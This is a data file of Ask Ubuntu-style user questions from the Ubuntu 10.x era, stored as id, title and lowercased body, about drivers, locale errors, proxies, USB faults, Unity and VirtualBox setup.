32944	how can i reinstall broadcom sta drivers ?	i 'm having problems enabling the broadcom sta proprietary wireless driver . i was using it previously , since i installed ubuntu 10.10 . i found out recently that this was causing problems with wired connectivity ( a problem for another thread ) so i switched to the broadcom b43 wireless driver , which solved that problem . one problem that it raised is that wireless was often quite slow , especially if i had two thing simultaneously downloading . to verify this i testing download something in three areas of the city that i live in , each using a different isp and the results were the same so , i want to switch back to the broadcom sta proprietary wireless driver , but when i activate it it does n't work . it reads `` this driver is activated but not in use '' . what can i do to make it work ? i 've tried adding `` wl '' to /etc/modules and have followed advice from this thread but it has n't worked of them have worked i 'm using ubuntu 10.10 . my computer specs : dell studio 1555 : pentium dual core t4300 ( 2.1ghz,800mhz,1mb ) , 4096mb 800mhz ddr2 dual channel , 512 mb ati mobility radeon hd 4570
32947	proxy settings do n't help with update manager	i 'm currently behind a proxy at my university . i can access the www on this computer by changing chromium 's proxy settings . i can also use the command line apt-get only by running this function each time : function uniproxy ( ) { read -s -p `` > > `` mypassword export http_proxy=http : //myusername : $ mypassword @ wwwproxy.stuff.is.here:8000 export https_proxy=http : //myusername : $ mypassword @ wwwproxy.stuff.is.here:8000 export ftp_proxy=http : //myusername : $ mypassword @ wwwproxy.stuff.is.here:8000 echo `` '' } when i change preferences > networks proxy appropriately , it wo n't let me use command-line apt-get . more importantly though , update manager can not connect even when i change the aforementioned settings . i also changed the synaptic settings to see if that would help , but alas - update manager wo n't connect . how can i resolve this ?
32948	rhythmbox does not return to same position in small display mode	ubuntu 10.10 , rhythmbox 0.13.1 i do n't know if this is a functionality is to be provided by the window manager or by rhythmbox . basically , what i do is put rhythmbox in small display mode and move it to the bottom left corner of my monitor . then i change to normal mode to select a new album , and if i put it in small mode again , it does n't return to the corner , but remains at a position depending on the height of the player . itunes on my mac returns to the same position as it was when in small mode . its not exactly a bug , but it will be a nice feature to have . is there some setting to enable in gconf-editor or something ?
32949	is there a shortcut in unity to hide/unhide the launcher ?	i think it would be convenient to be able to hide/unhide the launcher from a keyboard shortcut . then i am not forced to use the mouse to do so . i could hide the launcher and maximize a window all from the keyboard .
32954	how to set gmail as default mail application	is it possible to set the default mail application to be gmail within firefox ? currently , every time i click an email link in a program ( or in unity 's default dash/lense ) i get evolution starting up .
32955	is there a way to serve a vm located on a server to clients ?	here 's my situation : i have two asus celeron 800mhz 512mb systems that are currently running xp sp3 . our pos system is windows only , and will not run in wine . ( well , it runs , but not functionally ) i have other machines running ubuntu with vmware player hosting xp as a virtual machine for the pos . no issues there . but these two older systems do n't have enough ram to run even puppy linux and xp in a virtual machine , much less ubuntu or xubuntu with the vm . ( and they can not be upgraded ) presently , my option seems to be ( other than sticking with very slow xp systems ) to try to create a stripped down custom xp to fit it into less memory so i can run it in xubuntu or puppy in a vm . what i would `` like '' to do , is run xubuntu ( or puppy ) and serve the whole vm over the lan . i thought maybe a thin-client setup was the ticket , but i do n't want to serve the whole linux os if i can help it . these desktops still need to run libreoffice , firefox , and thunderbird . so i 'd like to just serve up the vm to each . also , it is quite possible , to have both desktops trying to run the pos simultaneously , so i 'll need separate instances of the vm for each client , if not each user on them . i do n't mind if the vm/pos is a little slow . but the main desktop needs to be reasonably responsive for other tasks , hence why i want to switch these two to linux . any ideas ?
32956	headphones phones do n't work on my toshiba satellite l655d-s5066 laptop	i 'm using a toshiba satellite l655d-s5066 my headphones do n't work is there a way to fix them using ubuntu or is this a sacrifice to use ubuntu .
32960	ext [ 34 ] `commit` option and filesystem integrity	i 'm running a fairly fresh and vanilla 10.10 install , built from scratch about a month ago on an acer aspire 5742 laptop . i use openbox as my window manager and run neither the kde nor gnome desktop stacks . i have n't yet figured out how to get the system to hibernate when low on battery power , so i get occasional power outages . i 've noticed that when my laptop switches over to battery power , my ext* partitions are remounted with the option commit=600 . when i switch back to ac , there is another set of remounts with commit=0 . this is apparent from entries in /var/log/syslog like mar 31 14:48:48 gatsby kernel : [ 414710.189306 ] ext4-fs ( dm-0 ) : re-mounted . opts : errors=remount-ro , commit=600 mar 31 14:48:48 gatsby kernel : [ 414710.324137 ] ext4-fs ( dm-1 ) : re-mounted . opts : commit=600 mar 31 14:48:48 gatsby kernel : [ 414710.749636 ] ext4-fs ( dm-2 ) : re-mounted . opts : commit=600 mar 31 16:35:58 gatsby kernel : [ 421128.882072 ] ext4-fs ( dm-0 ) : re-mounted . opts : errors=remount-ro , commit=0 mar 31 16:35:58 gatsby kernel : [ 421129.083283 ] ext4-fs ( dm-1 ) : re-mounted . opts : commit=0 mar 31 16:35:59 gatsby kernel : [ 421129.724136 ] ext4-fs ( dm-2 ) : re-mounted . opts : commit=0 the mount manual explains the meaning of the count option with respect to the ext3 filesystem thusly : commit=nrsec sync all data and metadata every nrsec seconds . the default value is 5 seconds . zero means default . what does this mean , exactly ? it seems to imply that writes may be cached for up to 10 minutes . does this mean that there could be filesystem corruption , or that some changes may go unsaved if my battery power runs out ?
32961	recovering from , and preventing , usb errors	when reconnecting a usb keyboard to my system , i got this stream of messages in /var/log/syslog : mar 31 22:35:01 gatsby kernel : [ 442633.491562 ] usb 2-1.2 : new low speed usb device using ehci_hcd and address 79 mar 31 22:35:01 gatsby kernel : [ 442633.579057 ] ehci_hcd 0000:00:1d.0 : fatal error mar 31 22:35:01 gatsby kernel : [ 442633.585381 ] ehci_hcd 0000:00:1d.0 : force halt ; handshake ffffc90000674824 00004000 00004000 - > -110 mar 31 22:35:01 gatsby kernel : [ 442633.585389 ] ehci_hcd 0000:00:1d.0 : hc died ; cleaning up mar 31 22:35:01 gatsby kernel : [ 442633.598955 ] usb 2-1.2 : device descriptor read/all , error -108 mar 31 22:35:01 gatsby kernel : [ 442633.598961 ] hub 2-1:1.0 : can not disable port 2 ( err = -19 ) mar 31 22:35:01 gatsby kernel : [ 442633.598974 ] hub 2-1:1.0 : can not reset port 2 ( err = -19 ) mar 31 22:35:01 gatsby kernel : [ 442633.598977 ] hub 2-1:1.0 : can not disable port 2 ( err = -19 ) mar 31 22:35:01 gatsby kernel : [ 442633.598983 ] hub 2-1:1.0 : can not reset port 2 ( err = -19 ) mar 31 22:35:01 gatsby kernel : [ 442633.598987 ] hub 2-1:1.0 : can not disable port 2 ( err = -19 ) mar 31 22:35:01 gatsby kernel : [ 442633.598992 ] hub 2-1:1.0 : can not reset port 2 ( err = -19 ) mar 31 22:35:01 gatsby kernel : [ 442633.598995 ] hub 2-1:1.0 : can not disable port 2 ( err = -19 ) mar 31 22:35:01 gatsby kernel : [ 442633.598998 ] hub 2-1:1.0 : unable to enumerate usb device on port 2 mar 31 22:35:01 gatsby kernel : [ 442633.599002 ] hub 2-1:1.0 : can not disable port 2 ( err = -19 ) mar 31 22:35:01 gatsby kernel : [ 442633.599015 ] usb 2-1 : usb disconnect , address 2 a normal set of log messages for the same event looks like this : mar 31 16:36:44 gatsby kernel : [ 421175.156518 ] usb 2-1.2 : new low speed usb device using ehci_hcd and address 74 mar 31 16:36:44 gatsby kernel : [ 421175.278006 ] input : dell dell usb keyboard as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/input/input63 mar 31 16:36:44 gatsby kernel : [ 421175.278256 ] generic-usb 0003:413c:2003.0038 : input , hidraw0 : usb hid v1.10 keyboard [ dell dell usb keyboard ] on usb-0000:00:1d.0-1.2/input0 since that error was logged , the system will no longer respond to the connection of usb devices . there is no record of these events in either /var/log/syslog or via dmesg . i 'm running 10.10 on an acer aspire 5742 laptop . it may be relevant that both my heci controller and smbus show up as unclaimed in the output from lshw . they are both listed as being /^\s*product : 5 series/3400 series chipset ( heci|smbus ) controller/ . i 'm booting with the acpi_osi= kernel argument . i 'd like to know how i can recover from such situations without rebooting the machine prevent these problems from occurring in the first place . update i tried $ sudo modprobe -r usbhid ; sudo modprobe usbhid this logged the following to /var/log/syslog apr 1 00:41:10 gatsby kernel : [ 450189.768916 ] usbcore : deregistering interface driver usbhid apr 1 00:41:10 gatsby kernel : [ 450189.768960 ] usbcore : deregistering interface driver hiddev apr 1 00:41:10 gatsby kernel : [ 450189.823210 ] usbcore : registered new interface driver hiddev apr 1 00:41:10 gatsby kernel : [ 450189.823246 ] usbcore : registered new interface driver usbhid apr 1 00:41:10 gatsby kernel : [ 450189.823250 ] usbhid : usb hid core driver but otherwise had no effect : newly-connected usb devices still do not work , nor are any syslog messages generated in response to their connection . i tried connecting devices to two different usb ports on different sides of the machine , both to the same non-effect . update 2 posted an ubuntu question on launchpad.net with the same content . update 3 : 2011-12-13 this has not happened to me in months . i have n't attempted to resolve the issue ; either it stopped happening because of a system update , or i 've just been lucky and not had an occurrence . i am still using ubuntu 10.10 . another user mentions having `` the same problem '' in an answer which should be a comment and should be removed .
32964	can not log in to ubuntu	i have a dual boot-up with windows 7 ultimate and ubuntu . my ubuntu 10.10 does not allow me to log in and says that the gnome power manager has not been installed properly & asks me to contact the system administrator . however i 'm sure that the my password is correct , because it worked perfectly fine until yesterday.how can i rectify this ?
32966	simplest way to swap esc key with ` key	what is the simplest way to swap the functionality of the esc key and the ` key ? system ➜ preferences ➜keyboard ➜ layouts ➜ options let me swap my ctrl key and capslock key , which was good , but it does n't seem to let me do other keys in a generalized way . the xmodmap answer that got accepted here was useful . now my ` key is on the physical esc key , and vice versa . the problem is that when i shift+esc i still only get a ` when i 'd like to get a tilde .
32972	how to copy/share awn settings ?	how can i copy/backup/save avant window manager ( awn ) settings and apply these settings to another computer ? thanks .
32974	where is zend-framework library ?	i 've installed zend-framework following the commands : sudo add-apt-repository ppa : zend-framework/ppa sudo apt-get update sudo apt-get install zend-framework zf.sh works but i was expecting the framework to be in /usr/local/zend and there is nothing ... where is it supposed to be ?
32975	when ( in-place ) upgrading to 11.04 are existing installs transferred to unity ?	just wondering what the default is/will be for 10.10 users currently using the standard gnome-panel desktop , who decided to upgrade through update manager .
32978	banshee deleted playlists keep reappearing	i 'm running banshee on a clean install of 64-bit 10.10 . when i add my music collection ( ~110 gb ) it crashes repeatedly . i eventually get it all loaded up after a few restarts . then i delete the default playlists and make my own . banshee is a bit buggy but i like it and i 'm trying to make this work . the problem i have is that two playlists keep reappearing after i delete them . each time i restart banshee , 'favorites ' and 'recent favorites ' appear in my list of playlists . as soon as i click on them they disappear and the next playlist below is highlighted . how do i permanently remove them , so they do n't come back ?
32979	why is ubuntu natty still using network manager instead of connman ?	i 've been using the new network indicator in natty as installed from the this article : http : //www.omgubuntu.co.uk/2011/03/indicator-network-is-looking-good-in-natty/ aside from looking a lot better than the default network selection applet that ships with natty currently , i 've found it 's also a lot faster at picking up wireless networks and connecting to them . i notice that it does n't have support for more complicated security protocols like wpa2-psk enterprise , etc . is this the reason it 's being omitted from natty ?
32983	add terminal to panel	is there any way to pin the terminal to the panel ? i 'm monitoring a server via top and would like to have some of the information ( at least the first row e.g . the load average ) always on my active workspace . i could reduce the terminal size and have it always on top and always on visible workspace but this still takes to much space . what i would like is a possibilty to add some of the top information to a notifier in the top panel . is there any setting in terminal i could use , or are there any other possibilities ? i do n't need to use terminal if there is any other application that alows to show these information .
32987	how to enable my terminal 's ctrl + shift + c ?	my terminal cant use ctrl + shift + c or ctrl + shift + v since i setup something . what can i do to get those shortcuts working again ? thanks .
32990	accessing partition inside virtualbox running ubuntu	how to map local partition / folder / drive with assigned letter like windows . this is useful to access from virtual machine installed within ubuntu with virtualbox .
32991	how do i add a static quicklist that opens a web page ?	i am working on creating unity launcher icons for web applications . evolution comes with quicklists so you can compose , go to calendar , etc . : i want to replicate the same thing but for my gmail icon . the unity launcherapi page talks about how to create static quicklists : x-ayatana-desktop-shortcuts=screen ; window [ screen shortcut group ] name=take a screenshot of the whole screen exec=gnome-screenshot targetenvironment=unity [ window shortcut group ] name=take a screenshot of the current window exec=gnome-screenshot -w targetenvironment=unity i have the .desktop file of the gmail shortcut , so i can edit it to add the static quicklists , my question is , what do i put in the exec= line to have it open in my browser so i can make compose , contacts , and calendar go to the right place ? ( assuming i have the correct urls , i 'm more wondering about the exec syntax )
32994	graphical bugs when putting gnome panel on the right side	i like to have my gnome panel ( the one with icons and the ubuntu menu ) on the right side , rather than making my wide-screen even smaller in height . it worked perfectly except with the `` ambiance '' theme , which recently became ubuntu 's default theme : as you can see , the shadow is repeated vertically , which makes an awful impression of tiles . other problem , shadows are printed horizontally even though the text is vertical , you can see `` 14 '' ad `` fri '' shadows in dark behind the vertical text . is it a known bug ? if not , how to fix it ?
32995	amd radeon hd 4250 - fan noise and driver choice	i have the asus eee-pc 1015t - this is an amd based netbook and it comes with a great amd radeon hd 4250 vga . with windows 7 it can play 1080p hd video smoothly and during normal usage the average noise level it 's quite low . with ubuntu 11.04 beta 1 the standard installed vga driver is the gallium 3d 0.4 which is good for a normal netbook experience but it causes 3 main problems : average fan noise level is really annoying ; high battery consumption ; it ca n't reproduce even 720p hd video . issue 3 is n't critical for me . ubuntu restricted driver does n't show any proprietary driver available for my configuration but in synaptic well-known fglrx driver are present . so how could i sort out issues 1 and 2 ? does fglrx work better with 4250 hd ? is there a program to control my eee-pc fan-speed ?
32999	what is vt.handoff=7 parameter in grub.cfg ?	i wonder what vt.handoff=7 parameter does . i can not find any good man for that ... btw , if you have a nice descriptoon about : search -- no-floppy -- fs-uuid -- set=root i would be happy : ) grub.cfg example : menuentry 'failsafe ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos8 ) ' search -- no-floppy -- fs-uuid -- set=root 36286167-4eba-4a1e-a202-155c6baafa01 linux /boot/vmlinuz-2.6.37-12-generic root=uuid=36286167-4eba-4a1e-a202-155c6baafa01 ro vt.handoff=7 quiet splash initrd /boot/initrd.img-2.6.37-12-generic } btw2 - i can not create tag vt.handoff ; (
33001	wifi on dell studio 15	i have recently updated to ubuntu 10.10 on my dell studio 1555 the wifi works perfectly in ubuntu 10.04 but in ubuntu 10.10 i ca n't connect at all . by default i have no wifi at all system- > administration- > additional drivers gives two driver options : broadcom b43 wireless driver broadcom sta wireless driver the sta driver shows as disconnected no matter what i do . and does n't detect any networks . the b43 driver sees the network but tries to connect forever despite the correct password and wireless security settings . ( i know the password works as i have other computers on the network ) i know the card works because i have windows vista dual booting and it can use the wifi fine . how can i get my wifi working ?
33004	accuracy of network speed shown by system monitor	how reliable is the speed shown by system monitor ? it varies 10-20 kbps with what nethogs show but is close to nload . so which one is more accurate ?
33006	filezilla high cpu usage	my filezilla takes about 80 % of cpu whenever its window is visible . when i minimize the window , cpu usage goes go back down to the expected , low percentage . i 've tried a few versions of filezilla from v3.3 to 3.4 , but there it has no effect . can anyone suggest some fixes for this problem ? i 'm using ubuntu 10.10 .
33010	certain windows are not opening in the last position/size i used them at	certain windows are not opening in the last position/size i used them at . opening `` compose a message '' with evolution through the message menu on the toolbar opens a window that is always in the top left of my screen . opening firefox 4.0 always opens maximized , even if i last used it in `` windowed '' mode . other things i 've tried that wo n't remember my custom positions : ccsm , terminal , gedit , sound recorder , calculator . some other stuff works fine like banshee , empathy , shutter , deluge . is this a bug ? is there a way to make these applications open in their last used positions/sizes ?
33011	how to assign keyboard shortcuts in kontact ?	i have trouble assigning shortcut in kontact . suppose i assign any shortcut in one of the software in kontact ( kmail/korganiser etc ) then when i open the kontact the shortcut works . if however i open kontact assign the shortcut there , it will not work when i start kontact again ( or the software alone ) . this is a problem only for the shortcut which allows to switch from on software to another since those are the only one i can not assign on each software independently . so i have two questions : am i the only one with those problem ? does anyone knows in which file the standard shortcut of contact are written , so i can just change them there ? i notice that when i change a shortcut it appears in .kde/share/apps/kontact/kontactui.rc but when i open kontact again it does n't work anymore . i 'm using kubuntu 10.10
33013	will livecd test results be aggregated into the laptop testing tracker ?	marco ceppi 's answer to a tangentially related question set me to wondering about the destination of all the tests that users run from the livecd menu . there 's a fairly comprehensive hardware compatibility test , at least as of 10.10 , that seems geared towards accumulating a database of ubuntu-friendly models , components , and peripherals . i must apologize for my vague description of this app ; if someone knows what i am talking about and can provide the actual name of the menu item , that would be wonderful . i just recall running it from the livecd before installation , after which point i switched over to openbox from gnome and have n't looked at the menu system since . marco 's answer mentions the laptop testing tracker , which seems like it could be a front end to this hypothetical db . however , there are currently only a few reports on that page . is this something we can expect to see made available in the near future ? are collected test results available at a different page/site ? it would be a tremendously beneficial resource for the community .
33018	how to bind to static ip address in mysql	i have an ubuntu server and i 've installed mysql . how would i use my two physical static ip addresses in my.cnf bind-address -- can i add two ip addresses ?
33019	why is n't firefox 4 available as an update from the update manager ?	i have ubuntu 10.10 , and firefox 3.6.16 . when i install the available updates from the update manager , i do n't get any updates for firefox 4 . is there a reason or am i missing something ?
33023	getting a problem with cardapio and gajim , wo n't launch due to a locale problem ?	after an update yesterday , every time i try to run gajim or cardapio , this is what i get : ( process:10142 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . i tried reinstalling cardapio and i 'm still getting the problem . since both are written in python i was guessing it must be a problem with python but i ca n't see which update could have caused this problem . i 'm at a loss as to what to do , since nothing in my searching has proven useful ( a bunch of unanswered forum posts for what seems to be a similar , but non-fatal error ) . edit : after following this answer locale problem when running xterm in ubuntu 10.04 , i am still at a loss as to a fix . i can launch the applications with lang=c , but , i do n't quite get how to make that default ( if this is needed ) . edit # 2 in seeking a solution , i tried to run clicompanion , and this is what i get : traceback ( most recent call last ) : file `` /usr/bin/clicompanion '' , line 27 , in < module > idioma = get_language ( ) file `` /usr/bin/clicompanion '' , line 18 , in get_language loc = locale.setlocale ( locale.lc_all , `` '' ) file `` /usr/lib/python2.6/locale.py '' , line 513 , in setlocale return _setlocale ( category , locale ) locale.error : unsupported locale setting
33024	will reinstalling ubuntu destroy my boot loader ?	i installed ubuntu on a spare hdd and use grub to select my os , vista or ubuntu . i can not remember my ubuntu password for the life of me . if i reinstall ubuntu could that destroy my ability to launch vista ? i plan on reinstalling via live cd unless there is an easier way .
33025	locale settings are not right . how can i reset them ?	i 've got a locale problem . the collating sequence in nautilus and other programs has changed . i get locale errors appearing in the terminal when i launch a gui app.. gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . the locale command produces error messages locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory lang=en_au language=en_au : en lc_ctype= '' en_au '' lc_numeric= '' en_au '' lc_time= '' en_au '' lc_collate=en_au.utf-8 lc_monetary= '' en_au '' lc_messages=en_au.utf-8 lc_paper= '' en_au '' lc_name= '' en_au '' lc_address= '' en_au '' lc_telephone= '' en_au '' lc_measurement= '' en_au '' lc_identification= '' en_au '' lc_all= as suggested in askubuntu question , i 've run the following commands , but there was no change . sudo apt-get install language-pack-en-base sudo dpkg-reconfigure locales i also tried the suggestion in askubuntu question ... also no change . apt-get install -- reinstall locales i think it began when i temporarily installed and uninstalled the urdu language input method editor via ibus .. it certainly happened on the same day . maybe it is ibus related , but i 've not had any problems with it before this . the os is 10.04
33026	configuring my router	i need to configure my router so i can access the website i have running on my computer from the outside world . how can i do this ? i think i need to open the port 80 on the router , which gets forwarded to a specific ip address i.e . 192.168.1.200 . then somehow tell ubuntu to send any traffic coming through port 80 to /var/www my router is a linksys befsr41 .
33034	how to use zte mu350 usb modem ?	hello everyone i 'm a newbie loving the ubuntu experience . i have a problem connecting my usb modem specified in the title on a cdma network in ghana ( expresso ) , i did some searching and found the usb_modeswitch . i have downloaded the latest tar.bz2 for the program and the data package . my question do i just need to compile and install this software and my modem will out of the box like in win7 . nb : even in windows the autorun works only the first time the modem is plugged in , afterwards if modem is plugged in , win7 recognises it but i have launch the gui to be able to use the modem unlike other modems in which the gui pops up everytime the modem is plugged in .
33037	installing solaris studio 12.2	i need help with installing solaris studio 12.2 on ubuntu . i looked at this question already and it did n't help : installing solaris studio 12.2 ? my problem with the solutions provided in that question is that i do not have a script to run when i extract the file i downloaded : solarisstudio12.2-linux-x86-tar-ml.tar.bz2 to extract it i am just using the ubuntu gui , archive manager . could this be my problem ?
33038	how to get microsoft natural ergonomic keyboard 4000 's zoom slider ( and other buttons ) to work ?	i use a microsoft natural ergonomic keyboard 4000 on ubuntu 10.10 . the multimedia keys ( volume , play/pause ) work , the mail and calculator button as well . now i would love to use the zoom slider , if it were possible i 'd like to use page scrolling with that . is there some way to enable that ?
33039	how do i install ubuntu 10.10 beside windows 7 onto a fake raid ?	i currently have 4 drives setup in raid 10 . i 've tried installing ubuntu straight to the metal but it does not recognize my windows partition and upon quitting the installation and then restarting , my raid goes offline . ive also tried creating a partition and using the windows version of the installer ( through windows ) . when it restarts and begins finalizing the installation , it snags and complains that it can not find the installation iso . again , restarting shows that my raid members are offline . any ideas ?
33043	can i change the unity launcher transparency ?	is it possible to change the background opacity of the unity launcher ? i see you can change the panel opacity , but then the launcher clashes with the panel .
33047	cron user root or www-data ?	i 'm running a website on 10.04 and am not sure how to set up my crontab . should i create it under root or a user such as www-data ? python , postgres , nginx .
33050	how do you change the font color in the unity panel ?	with my current ( and favorite ) theme the unity panel is black text on a black background . is there a way to set the font color in unity or the theme somehow ?
33051	how do i wipe all personal information from my computer ?	i 'm awful with computers , i have ubuntu 10.10 and do n't understand partioning etc . i want to wipe my drive , everything except the operating system ( and auto boot obviously ) , without having to use a memory stick external hard drive etc , just leave ubuntu os on but delete everything else , is this possible ? thank you so much in advance : ) ps . i have a format drive and format volumes option if this helps . drive says something about master boot record , volumes says something about linux ( 0x83 ) , which my computer once was or ubuntu 10.10 is ? : ) disk /dev/sda : 8069 mb , 8069677056 bytes 255 heads , 63 sectors/track , 981 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0008fa72 device boot start end blocks id system /dev/sda1 * 1 933 7490560 83 linux partition 1 does not end on cylinder boundary . /dev/sda2 933 981 387073 5 extended
33055	virtualbox : host only networking - proxy internet connection	i 'll ask my question first , then give details about where i am coming from : is it possible to use host only , then have ubuntu act as a proxy to provide internet access to windows ? if so , how ? i am trying to get the right combination of networking for my virtualbox windows client vm ( win7 ) . my host is ubuntu 10.10 ( maverick ) . i believe i understand the basic network options ( please correct me if i am incorrect ) : nat - host ca n't communicate with guest but guest has access to all host 's adapters host only - separate adapter but guest has no net access bridged - bridge an adapter in the host with the virtual adapter to give the host access to the host adapter i am trying to give my win guest internet access , but also access the host in a separate network . bridged only works when the host is connected to the internet ( this is a laptop ) so when it 's not connected the network is down . thanks i appreciate your help .
33062	low-battery-power action without gnome-power-manager	i 'm running the openbox wm and would like to avoid loading the gnome stack . one of the lingering issues i have to resolve is avoiding abrupt system crashes due to depleted battery power . is there a low-profile , low-dependency daemon that will handle this situation ? i 'd like to be able to configure it to , for example , drop the system down into hibernation at 4 % battery life if the ac is not connected . i suppose i could just write a little cron job to poll /sys/ ... /batt*/.. and /sys/ ... /ac*/ ... every 10 minutes or so , but it seems like there might be some edge cases that need tending . update laptop-mode-tools sounds promising : it ... supports various ... power management features , such as ... automatically hibernating if battery levels are too low ... however , it does n't seem to be possible to install it in maverick without relatively dire consequences . on my system , its installation also requires the removal of the acpi-support package , which sounds sort of ominous .
33064	is wubi safe on windows installation ?	is wubi installer dangerous ? i want to know this before i install it on my laptop . i really want to use ubuntu os as my secondary operating system , primary being windows . thanks .
33068	building a new rig : will a 9800 gt work well for my needs ?	i 'm in the process of pricing out and purchasing components for a new computer , and i wanted to make sure that my selections will run as expected in my planned install of ubuntu 10.10 x64 . right now i 'm looking at this gpu and motherboard : evga 512-p3-n982-b2 geforce 9800 gt akimbo gigabyte ga-880gm-ud2h i 'm including the motherboard just in case i 've made some gross oversight and these two components are n't compatible , or my novice-level knowledge of linux shines through and i 've missed something entirely about how the linux kernel interacts with bits of the motherboard . one can never be too careful . my gaming habits are limited to minecraft and potentially wow , and to be honest i 'll probably have a windows partition for running wow anyway until i double the planned 4gb of ram ( i 've already selected a quad-core cpu ) . in any case i 'm not the type of gamer who runs the latest games at 1920x1080 resolution with all the settings on max . i 'm more interested in smoothness than flashy graphics . my question boils down to this : will this gpu run properly and allow me to play something like minecraft with a respectable level of performance ? additionally , how will wow perform ? i would also be greatly appreciative of any random advice that you may have to offer on this matter , as i 'd rather not leave any stone unturned before i make my purchases .
33070	connecting to internet through another computers connection	i have an old laptop running ubuntu 10.10 ( server edition ) that i want to connect to the internet , but it 's wireless card is n't working properly , so on the recommendation by a friend , i tried to connect to my desktop ( windows xp ) through ethernet , and connect to the internet through that , but the old guides i can find are for the desktop edition of ubuntu ( e.g . gui-based ) , and i do n't know enough about the terminal to figure it out on my own . are there any good guides then , on how to configure ubuntu to connect like this , strictly through terminal commands ?
33072	how to restrict users on deleting files from trash folder ?	i want to restrict my users on deleting files from trash . also i dont want my users to delete files bypassing trash . is there any way to do this ?
33075	hp laserjet 1020 always asks for driver install	on ubuntu 10.10 , hp laserjet 1020 works plug and play style ( plugged it in , printed test page without installing anything ) . but , every time i connect ( or power on ubuntu ) printer starts it 's driver install console , offering to download drivers/install existing/quit install . i 've tried downloading but it fails with some python error . is there way to disable this driver install ? or at least work around this python error so that install can pass ... screenshot of error :
33076	google talk on empathy keeps disconnecting	i am unable to use google talk with empathy since i updated to 10.10 . i have this problem on three computers , one which updated and two that were fresh installs ( 4 months apart , so a different image ) . the error i get is : '' disconected - no reason specified ''
33078	what is a virtual terminal for ?	when i press ctrl+alt+f1 it goes to virtual terminal . what is this virtual terminal for ? when do you need to use it ?
33081	installed libjava3d-java but can not compile my java3d project	on my mac , i can easily compile a java project using java3d . on a plain maverick with default-jdk , i get a lot of errors : ./dreidimansicht.java:52 : can not find symbol symbol : class canvas3d location : class dreidimansicht canvas3d canvas = new canvas3d ( config ) ; ^ so i installed the libjava3d-java package but it gives me the exact same error messages . since i want to use launchpad 's build service , i can not just install some stuff on my machine to get it to work . is there some package that i can install to get the compilation to work ? i compile it with a plain javac mainclass.java .
33083	why do n't my extensions show up in banshee ?	+++ note : the behavior detailed in this question might actually be a bug . awaiting comment from developers in bug 748461 . i installed banshee along with the community extensions pack . when i opened the program the first time , i got a long list of extensions to chose from , for example the zeitgeist data logger . the second time i started banshee only half of that list was still showing up ! i tried to deinstall banshee completely by going to synaptic and selecting `` completely remove banshee '' . to my surprise , however , when i then reinstalled banshee all settings were still there . the extensions list also stayed the same . what can i do to access all the other extensions ? to make clear how it looks like , here are two screenshots : the installed package this list looks rather empty for such a huge amount of extensions ... .
33089	what user settings control audio access ?	running a regularly updated 10.04 lts we have a weird issue with access to audio with pulseaudio 0.9.22 . sound device is ati technologies inc sbx00 azalia ( intel hda ) login user1 after reboot : sound ok login user2 after reboot : sound ok login user1 then user2 : sound ok : both have sound but login user2 then user1 : only user2 has sound login user2 after boot , logout user2 , then login user1 : no sound and login user3 then user1 : all is good ! in the two latter cases user1 is getting repeated errors in syslog : protocol-native.c : denied access to client with invalid authorization data these errors disappear only after pulseaudio is started from user1 manually in a terminal . then audio access is fine for both . there is an error module-alsa-card.c : failed to find a working profile but still sound output is fine . we both are not a member of the audio group . deleting ~/.pulse from both accounts has no effect on this behaviour . the issue started in 9.10 karmic and continued to be there even after an upgrade to 10.04 lucid lts . this indicates that some erroneous settings survived the upgrades . the dependency on boot order of users indicates that some other user specific settings may be involved , but we have no idea where to start searching . from tests with 3 users it seems that only settings for user2 are broken . loading pulseaudio modules module-esound-protocol-unix and module-native-protocol-unix with the option auth-anonymous=1 in both default.pa , and system.pa did not change this behaviour . neither did it help to delete pulseaudio cookies ~/.esd_auth and ~/.pulse-cookie from both users . added here is our default.pa and our system.pa . suggestions 1 ) to 8 ) from the answer below did not make a change ( running pulseaudio in system mode was not possible ) but unplugging the external speaker , rebooting , plugging the speaker back in and reboot again from user1 did the trick . it is still unclear where this hardware information was ( erroneously ) stored and why it affected only one user account .
33092	how well do ati drivers work with unity ?	i have an ati 4650 graphics card . and when i install the proprietary driver - there are glitches and blackness all over the screen . i 've also read somewhere that ati cards do n't work with 11.04 yet . is it true ? when will i be able to test 11.04 then ? p.s . by not working i mean - unity does n't work . the classic gnome shell works fine .
33097	uninstalling matlab from laptop , how to get rid of launcher icon ?	i messed up my matlab install ... followed https : //help.ubuntu.com/community/matlab/r2010a but launcher is n't working . it says `` could not launch 'matlab r2010a ' failed to execute child process `` matlab '' ( no such file or directory ) . probably messed up the place where i downloaded it . i want to start off with a clean slate.. i removed all of the files installed , but am left with the launcher icon created using these instructions : create a matlab launcher get an icon : sudo wget http : //upload.wikimedia.org/wikipedia/commons/2/21/matlab_logo.png -o /usr/share/icons/matlab.png get the launcher file : sudo wget 'https : //help.ubuntu.com/community/matlab ? action=attachfile & do=get & target=matlab-r2010a.desktop ' -o /usr/share/applications/matlab.desktop how do i remove this launcher icon ? ? ? thank you ! !
33098	can i try the 2d version of unity on a live cd ?	my graphics card does n't support 3d . can i try out the 2d version on the live cd ?
33110	how to set two runing internet connections at same time ?	as the title say , i ca n't find the option how to set two internet connections running at same time . the problem is , when i want to watch iptv ( ethernet connection ) and browsing on the internet ( wlan connection ) at the same time . is there any option to do this ? thank you in advance !
33111	audio cuts in and out when using spotify linux preview	i 'm not sure how many people on this forum use spotify , but here goes . i have spotify linux preview installed on ubuntu 10.10 and so far it has worked perfectly for me . in the past few days however , the audio keeps cutting in an out intermittently . i 'm not sure whether this is an audio issue , or a streaming issue , or a caching issue . is anyone else facing the same problem - or know how to narrow down what could be the cause ? fyi , i have also raised this issue on the official spotify support forum . i know there 's a similar problem for spotify being run on wine that can be solved by changing to oss from pulseaudio in wine , but that does n't seem to be issue here with the native linux client .
